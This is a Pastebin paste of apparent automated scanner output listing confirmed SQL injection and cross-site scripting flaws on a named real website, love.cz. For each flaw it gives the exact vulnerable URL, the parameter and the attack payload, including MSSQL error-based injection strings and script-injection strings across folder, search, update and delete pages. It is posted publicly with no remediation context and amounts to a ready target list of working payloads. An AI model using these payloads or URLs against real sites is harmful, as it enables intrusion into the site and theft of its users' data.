API tools faq
paste
Advertisement
sroub3k

love.cz

sroub3k
Dec 29th, 2011
279
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.66 KB | None | 0 0
raw download clone embed print report
  1. [High Possibility] SQL Injection -- http://love.cz
  2.  
  3. Severity : Critical
  4. Confirmation : Confirmed
  5. Detection Accuracy :
  6. Vulnerable URL : http://www.love.cz/folder.php?id=%27
  7. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  8. Parameter Name: id
  9. Parameter Type: Querystring
  10. Attack Pattern: %27
  11.  
  12. Severity : Critical
  13. Confirmation : Confirmed
  14. Detection Accuracy :
  15. Vulnerable URL : http://www.love.cz/view.php?id=%27
  16. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  17. Parameter Name: id
  18. Parameter Type: Querystring
  19. Attack Pattern: %27
  20.  
  21. Severity : Critical
  22. Confirmation : Confirmed
  23. Detection Accuracy :
  24. Vulnerable URL : http://www.love.cz/folder.php?id=%27&page=2
  25. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  26. Parameter Name: id
  27. Parameter Type: Querystring
  28. Attack Pattern: %27
  29.  
  30. Severity : Critical
  31. Confirmation : Confirmed
  32. Detection Accuracy :
  33. Vulnerable URL : http://www.love.cz/search.php
  34. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  35. Parameter Name: id
  36. Parameter Type: Post
  37. Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
  38.  
  39. Severity : Critical
  40. Confirmation : Confirmed
  41. Detection Accuracy :
  42. Vulnerable URL : http://www.love.cz/update.php?id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&cat=4
  43. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  44. Parameter Name: id
  45. Parameter Type: Querystring
  46. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  47.  
  48. Severity : Critical
  49. Confirmation : Confirmed
  50. Detection Accuracy :
  51. Vulnerable URL : http://www.love.cz/delete.php?id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&cat=4
  52. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  53. Parameter Name: id
  54. Parameter Type: Querystring
  55. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  56.  
  57. Severity : Critical
  58. Confirmation : Confirmed
  59. Detection Accuracy :
  60. Vulnerable URL : http://www.love.cz/search.php?id=%27&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=3
  61. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  62. Parameter Name: id
  63. Parameter Type: Querystring
  64. Attack Pattern: %27
  65.  
  66. Severity : Critical
  67. Confirmation : Confirmed
  68. Detection Accuracy :
  69. Vulnerable URL : http://www.love.cz/search.php?id=1&page=%27&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=3
  70. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  71. Parameter Name: page
  72. Parameter Type: Querystring
  73. Attack Pattern: %27
  74.  
  75. Severity : Critical
  76. Confirmation : Confirmed
  77. Detection Accuracy :
  78. Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=%27&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=3
  79. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  80. Parameter Name: s_region
  81. Parameter Type: Querystring
  82. Attack Pattern: %27
  83.  
  84. Severity : Critical
  85. Confirmation : Confirmed
  86. Detection Accuracy :
  87. Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=%27&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=3
  88. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  89. Parameter Name: s_znameni
  90. Parameter Type: Querystring
  91. Attack Pattern: %27
  92.  
  93. Severity : Critical
  94. Confirmation : Confirmed
  95. Detection Accuracy :
  96. Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=%27&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=3
  97. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  98. Parameter Name: s_icq
  99. Parameter Type: Querystring
  100. Attack Pattern: %27
  101.  
  102. Severity : Critical
  103. Confirmation : Confirmed
  104. Detection Accuracy :
  105. Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=%27&s_vek=3&s_foto=3&s_www=3&s_type=3
  106. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  107. Parameter Name: s_telefon
  108. Parameter Type: Querystring
  109. Attack Pattern: %27
  110.  
  111. Severity : Critical
  112. Confirmation : Confirmed
  113. Detection Accuracy :
  114. Vulnerable URL : http://www.love.cz/update.php
  115. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  116. Parameter Name: id
  117. Parameter Type: Post
  118. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  119.  
  120. Severity : Critical
  121. Confirmation : Confirmed
  122. Detection Accuracy :
  123. Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=%27&s_foto=3&s_www=3&s_type=3
  124. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  125. Parameter Name: s_vek
  126. Parameter Type: Querystring
  127. Attack Pattern: %27
  128.  
  129. Severity : Critical
  130. Confirmation : Confirmed
  131. Detection Accuracy :
  132. Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=%27&s_www=3&s_type=3
  133. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  134. Parameter Name: s_foto
  135. Parameter Type: Querystring
  136. Attack Pattern: %27
  137.  
  138. Severity : Critical
  139. Confirmation : Confirmed
  140. Detection Accuracy :
  141. Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=%27&s_type=3
  142. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  143. Parameter Name: s_www
  144. Parameter Type: Querystring
  145. Attack Pattern: %27
  146.  
  147. Severity : Critical
  148. Confirmation : Confirmed
  149. Detection Accuracy :
  150. Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=%27
  151. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  152. Parameter Name: s_type
  153. Parameter Type: Querystring
  154. Attack Pattern: %27
  155.  
  156. Severity : Critical
  157. Confirmation : Confirmed
  158. Detection Accuracy :
  159. Vulnerable URL : http://www.love.cz/search.php
  160. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  161. Parameter Name: s_region
  162. Parameter Type: Post
  163. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  164.  
  165. Severity : Critical
  166. Confirmation : Confirmed
  167. Detection Accuracy :
  168. Vulnerable URL : http://www.love.cz/search.php
  169. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  170. Parameter Name: s_type
  171. Parameter Type: Post
  172. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  173.  
  174. Severity : Critical
  175. Confirmation : Confirmed
  176. Detection Accuracy :
  177. Vulnerable URL : http://www.love.cz/delete.php
  178. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  179. Parameter Name: id
  180. Parameter Type: Post
  181. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  182.  
  183. Severity : Critical
  184. Confirmation : Confirmed
  185. Detection Accuracy :
  186. Vulnerable URL : http://www.love.cz/search.php
  187. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  188. Parameter Name: s_znameni
  189. Parameter Type: Post
  190. Attack Pattern: convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
  191.  
  192.  
  193.  
  194. ||| XSS - (Cross-site Scripting) * Cross from NetCross :)
  195.  
  196.  
  197. Severity : Important
  198. Confirmation : Confirmed
  199. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  200.  
  201. Vulnerable URL : http://www.love.cz/folder.php?id='"--></style></script><script>alert(0x000084)</script>
  202. Attack Pattern: '"--></style></script><script>alert(0x000084)</script>
  203.  
  204. Vulnerable URL : http://www.love.cz/folder.php?id='"--></style></script><script>alert(0x000099)</script>&page=2
  205. Attack Pattern: '"--></style></script><script>alert(0x000099)</script>
  206.  
  207. Vulnerable URL : http://www.love.cz/foto.php3?id=16367.jpg'"--></style></script><script>alert(0x0000A9)</script>
  208. Attack Pattern: 16367.jpg'"--></style></script><script>alert(0x0000A9)</script>
  209.  
  210. Vulnerable URL : http://www.love.cz/search.php
  211. Parameter Name: id
  212. Parameter Type: Post
  213. Attack Pattern: 5'"--></style></script><script>alert(0x0000AE)</script>
  214.  
  215. Vulnerable URL : http://www.love.cz/update.php?id='"--></style></script><script>alert(0x00014D)</script>&cat=4
  216. Attack Pattern: '"--></style></script><script>alert(0x00014D)</script>
  217.  
  218. Vulnerable URL : http://www.love.cz/update.php?id=16672&cat='"--></style></script><script>alert(0x00014E)</script>
  219. Attack Pattern: '"--></style></script><script>alert(0x00014E)</script>
  220.  
  221. Vulnerable URL : http://www.love.cz/delete.php?id='"--></style></script><script>alert(0x000179)</script>&cat=4
  222. Attack Pattern: '"--></style></script><script>alert(0x000179)</script>
  223.  
  224. Vulnerable URL : http://www.love.cz/delete.php?id=16672&cat='"--></style></script><script>alert(0x00018A)</script>
  225. Attack Pattern: '"--></style></script><script>alert(0x00018A)</script>
  226.  
  227. Vulnerable URL : http://www.love.cz/search.php?id='"--></style></script><script>alert(0x0001A3)</script>&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=3
  228. Attack Pattern: '"--></style></script><script>alert(0x0001A3)</script>
  229.  
  230. Vulnerable URL : http://www.love.cz/update.php
  231. Parameter Name: cat
  232. Parameter Type: Post
  233. Attack Pattern: '"--></style></script><script>alert(0x0002A4)</script>
  234.  
  235. Vulnerable URL : http://www.love.cz/delete.php
  236. Parameter Name: cat
  237. Parameter Type: Post
  238. Attack Pattern: '"--></style></script><script>alert(0x0002D4)</script>
  239.  
  240. Vulnerable URL : http://www.love.cz/delete.php
  241. Attack Pattern: '"--></style></script><script>alert(0x0002D9)</script>
  242.  
  243.  
  244. * Programming by NetCross Design Studio All rights reserved.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!